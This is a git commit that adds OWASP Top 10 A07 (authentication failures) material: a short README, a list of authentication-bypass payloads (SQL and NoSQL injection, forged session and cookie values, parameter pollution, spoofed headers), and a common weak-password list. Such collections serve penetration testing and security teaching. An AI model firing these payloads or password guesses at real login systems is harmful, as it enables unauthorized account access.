Add comprehensive OWASP Top 10 directory structure with injection payloads

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>

OWASP-Top-10/A07-Identification-Authentication-Failures/README.md

@@ -0,0 +1,15 @@
+# A07 - Identification and Authentication Failures
+
+## Description
+Previously known as Broken Authentication, this category includes failures related to user identity, authentication, and session management. This can allow attackers to compromise passwords, keys, or session tokens, or exploit implementation flaws to assume other users' identities.
+
+## Common Vulnerabilities
+- Weak password requirements
+- Credential stuffing
+- Broken session management
+- Missing multi-factor authentication
+- Insecure password recovery
+- Session fixation
+
+## Testing Approach
+Test authentication mechanisms, session handling, password policies, and account recovery processes.

OWASP-Top-10/A07-Identification-Authentication-Failures/auth-bypass-payloads.txt

@@ -0,0 +1,47 @@
+# Authentication Bypass Payloads
+
+# SQL injection authentication bypass
+admin' --
+admin' #
+admin'/*
+' OR '1'='1' --
+' OR 1=1--
+admin' OR '1'='1
+') OR ('1'='1
+' OR 'x'='x
+admin') OR ('1'='1'--
+
+# NoSQL authentication bypass
+{"username": {"$gt": ""}, "password": {"$gt": ""}}
+{"username": {"$ne": null}, "password": {"$ne": null}}
+{"username": "admin", "password": {"$gt": ""}}
+{"username": {"$in": ["admin", "administrator"]}, "password": {"$gt": ""}}
+
+# JSON payload manipulation
+{"username":"admin","password":"admin","role":"admin"}
+{"username":"admin","password":"wrong","isAdmin":true}
+{"username":"admin","is_authenticated":true}
+
+# Session manipulation
+PHPSESSID=admin
+session_id=00000000-0000-0000-0000-000000000001
+token=admin_token
+auth=true
+
+# Parameter pollution
+username=attacker&username=admin
+user=normal&user=admin
+
+# Cookie manipulation
+admin=true
+isAdmin=1
+role=admin
+authenticated=true
+user_level=admin
+
+# Header injection
+X-Forwarded-For: 127.0.0.1
+X-Original-URL: /admin
+X-Rewrite-URL: /admin
+X-Originating-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1

OWASP-Top-10/A07-Identification-Authentication-Failures/weak-passwords-payloads.txt

@@ -0,0 +1,47 @@
+# Weak Password List
+
+# Common weak passwords
+password
+123456
+12345678
+qwerty
+abc123
+password123
+admin
+letmein
+welcome
+monkey
+
+# Pattern-based weak passwords
+Password1
+Admin123
+Welcome1
+Qwerty123
+Abc12345
+
+# Keyboard patterns
+qwerty
+asdfgh
+zxcvbn
+qwertyuiop
+asdfghjkl
+
+# Number sequences
+123456
+123456789
+1234567890
+000000
+111111
+
+# Company/service related
+company123
+service2023
+admin2023
+user2023
+
+# Dictionary words
+dragon
+football
+baseball
+superman
+batman